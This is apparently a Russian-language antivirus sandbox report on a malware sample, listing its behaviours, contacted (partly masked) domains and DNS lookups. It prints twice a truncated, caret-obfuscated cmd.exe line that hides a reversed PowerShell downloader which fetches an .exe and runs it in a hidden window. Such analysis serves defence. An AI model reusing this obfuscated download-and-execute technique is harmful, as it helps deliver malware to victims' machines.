Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^se^t 8^J^Z^j= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac};k^a^er^b;hi^b$^ ^met^I-^ekovn^I^;)h^ib^$^ ,r^T^S^$(e^l^i^F^d^ao^ln^w^oD.Zjb$^{^yrt^{)V^H^b^$ n^i^ rT^S^$(hc^aer^o^f;'^exe.'^+^ErH^$+'...
Сетевая активность
Подключается к
- 'je#####oplechicago.org':443
- 'la##ka.org':80
- 'la##ka.org':443
- 'it####namirim.org':80
- 'h3#####ologia.com.br':80
TCP
- 'je#####oplechicago.org':443
- 'la##ka.org':443
UDP
- DNS ASK th####konionusa.com
- DNS ASK jp##a.org
- DNS ASK je#####oplechicago.org
- DNS ASK la##ka.org
- DNS ASK it####namirim.org
- DNS ASK h3#####ologia.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^se^t 8^J^Z^j= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac};k^a^er^b;hi^b$^ ^met^I-^ekovn^I^;)h^ib^$^ ,r^T^S^$(e^l^i^F^d^ao^ln^w^oD.Zjb$^{^yrt^{)V^H^b^$ n^i^ rT^S^$(hc^aer^o^f;'^exe.'^+^ErH^$+'...' (со скрытым окном)
